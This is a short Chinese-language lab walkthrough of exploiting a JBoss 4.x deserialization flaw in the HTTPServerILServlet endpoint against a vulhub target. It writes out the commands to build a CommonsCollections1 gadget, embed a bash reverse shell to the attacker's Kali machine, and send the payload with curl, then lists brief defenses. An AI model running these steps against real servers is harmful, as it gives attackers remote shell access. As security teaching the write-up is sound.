一、漏洞介绍
1.1 漏洞简介
JBoss是一个基于J2EE的开放源代码应用服务器,用户占有量较大,JBoss实现过程的JMS over HTTP Invocation Layer的HttpServerILServlet.java文件存在反序列化漏洞。
1.2 影响版本
- JBoss<4.x
1.3 利用路径
/jbossmq-httpil/HTTPServerILServlet
1.4 全球统计
二、环境搭建
- 受害者IP:192.168.159.129(vulhub)
- 攻击者IP:192.168.159.128(kali)
》》启动Jbos AS 4.0.5
》》访问web站点
三、操作过程
》》使用JavaDeserH2HC工具
》》使用Gadget:ExampleCommonsCollections1WithHashMap编译生成序列化数据
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
》》序列化恶意数据到文件(bash反弹shell)
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.159.128/19111 0>&1"
》》nc开启shell监听
》》以二进制的方式POST发送数据到目标站点
curl http://192.168.159.129:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser
》》成功收到shell
四、防御措施
- 将JBoss版本升级到最新
- 尽量不要将JBoss映射到公网